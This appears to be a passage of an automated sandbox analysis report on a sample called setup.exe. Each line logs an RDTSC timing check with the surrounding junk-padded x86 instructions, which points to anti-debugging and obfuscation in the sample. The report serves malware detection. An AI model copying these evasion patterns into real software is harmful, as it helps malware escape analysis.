Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5DFA39 second address: 5DFA56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 jmp 00007FEA5C6FB9F6h 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E2C08 second address: 5E2C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E26DF second address: 5E26E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E26E3 second address: 5E26F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E26F9 second address: 5E2729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007FEA5C6FB9F1h 0x0000000c popad 0x0000000d jng 00007FEA5C6FB9ECh 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jne 00007FEA5C6FB9E6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E2729 second address: 5E2750 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FEA5CDC3A20h 0x0000000d jmp 00007FEA5CDC3A1Bh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E2750 second address: 5E2754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E2754 second address: 5E2758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E2758 second address: 5E275E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5E28B9 second address: 5E28BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0B60 second address: 5F0B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0B66 second address: 5F0B97 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEA5CDC3A16h 0x00000008 js 00007FEA5CDC3A16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007FEA5CDC3A16h 0x00000018 jmp 00007FEA5CDC3A29h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5F0B97 second address: 5F0BB0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a jmp 00007FEA5C6FB9ECh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 60006B second address: 600071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 600071 second address: 6000A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FEA5C6FB9EFh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEA5C6FB9F8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6000A2 second address: 6000C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FEA5CDC3A1Ah 0x00000008 jmp 00007FEA5CDC3A1Ch 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6000C2 second address: 6000C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6000C6 second address: 6000CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FFBEB second address: 5FFBF7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FFBF7 second address: 5FFC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FEA5CDC3A16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 5FFD97 second address: 5FFDA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FEA5C6FB9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 61B189 second address: 61B19A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FEA5CDC3A16h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 61B19A second address: 61B19E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4EE7DA second address: 4EE7DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 61A3E6 second address: 61A3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEA5C6FB9EEh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 61AAD0 second address: 61AAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 61AAD4 second address: 61AAD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 61AAD8 second address: 61AAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FEA5CDC3A20h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 61DE30 second address: 61DE3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FEA5C6FB9E6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 61DE3C second address: 61DE40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6209AB second address: 6209B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6209B1 second address: 6209B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620A8D second address: 620A92 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620A92 second address: 620AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jbe 00007FEA5CDC3A18h 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620AA6 second address: 620ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ebx 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 pop ebx 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007FEA5C6FB9F1h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620D73 second address: 620D79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620D79 second address: 620DBF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEA5C6FB9FEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d stc 0x0000000e push dword ptr [ebp+122D25D6h] 0x00000014 je 00007FEA5C6FB9ECh 0x0000001a mov edx, dword ptr [ebp+122D3355h] 0x00000020 call 00007FEA5C6FB9E9h 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620DBF second address: 620DC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620DC3 second address: 620DE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007FEA5C6FB9E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620DE8 second address: 620DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnp 00007FEA5CDC3A16h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620DFB second address: 620E01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620E01 second address: 620E42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FEA5CDC3A1Bh 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 jmp 00007FEA5CDC3A1Fh 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620E42 second address: 620E58 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FEA5C6FB9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 620E58 second address: 620E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 6226F1 second address: 62270F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEA5C6FB9F4h 0x00000009 pop esi 0x0000000a push esi 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 622302 second address: 622308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50D88 second address: 4B50DBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FEA5C6FB9F6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEA5C6FB9EEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50DBF second address: 4B50DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50DC5 second address: 4B50DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50DC9 second address: 4B50DCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50DCD second address: 4B50E0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FEA5C6FB9F9h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEA5C6FB9F8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50E0D second address: 4B50E11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50E11 second address: 4B50E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50E17 second address: 4B50E1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50E1D second address: 4B50E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B50E21 second address: 4B50E25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B40C65 second address: 4B40CD5 instructions: 0x00000000 rdtsc 0x00000002 call 00007FEA5C6FB9F2h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push esp 0x0000000c pushad 0x0000000d mov al, E1h 0x0000000f call 00007FEA5C6FB9F9h 0x00000014 call 00007FEA5C6FB9F0h 0x00000019 pop esi 0x0000001a pop edx 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f jmp 00007FEA5C6FB9EEh 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 mov cx, 1F8Dh 0x0000002b mov eax, 52BB2789h 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push edi 0x00000036 pop ecx 0x00000037 mov cx, dx 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80A0E second address: 4B80A4C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FEA5CDC3A29h 0x00000008 sub esi, 0D338EA6h 0x0000000e jmp 00007FEA5CDC3A21h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80A4C second address: 4B80A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80A50 second address: 4B80A56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80A56 second address: 4B80A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80A5C second address: 4B80A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B200DA second address: 4B2011E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEA5C6FB9F1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEA5C6FB9F8h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B2011E second address: 4B20122 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20122 second address: 4B20128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20128 second address: 4B20165 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, C703h 0x00000007 pushfd 0x00000008 jmp 00007FEA5CDC3A28h 0x0000000d and eax, 410BF4C8h 0x00000013 jmp 00007FEA5CDC3A1Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20165 second address: 4B20169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20169 second address: 4B20184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A27h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20184 second address: 4B201B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d push esi 0x0000000e mov edi, 06B4211Eh 0x00000013 pop ebx 0x00000014 popad 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B201B6 second address: 4B201BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B201BA second address: 4B201C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B201C0 second address: 4B201C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20209 second address: 4B2020D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B2020D second address: 4B20227 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20227 second address: 4B2022D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B2022D second address: 4B20231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B20231 second address: 4B2024B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f movzx eax, bx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B409E0 second address: 4B40A20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5CDC3A1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e push ebx 0x0000000f mov bl, ch 0x00000011 pop edx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007FEA5CDC3A20h 0x0000001e sub ax, 18E8h 0x00000023 jmp 00007FEA5CDC3A1Bh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B40A20 second address: 4B40A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B40A40 second address: 4B40A44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B4059B second address: 4B405A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B405A1 second address: 4B405B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B405B3 second address: 4B405C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B405C4 second address: 4B405CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B404BF second address: 4B404C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B404C3 second address: 4B404C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B404C9 second address: 4B40564 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dl, al 0x0000000d jmp 00007FEA5C6FB9F3h 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FEA5C6FB9EFh 0x0000001b jmp 00007FEA5C6FB9F3h 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 mov ch, bh 0x00000026 mov edi, esi 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FEA5C6FB9F4h 0x00000032 adc cx, DF48h 0x00000037 jmp 00007FEA5C6FB9EBh 0x0000003c popfd 0x0000003d mov dl, al 0x0000003f popad 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FEA5C6FB9EEh 0x00000048 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B80888 second address: 4B808B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEA5CDC3A27h 0x00000008 pop eax 0x00000009 mov ax, bx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEA5CDC3A1Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B808B8 second address: 4B808C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEA5C6FB9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
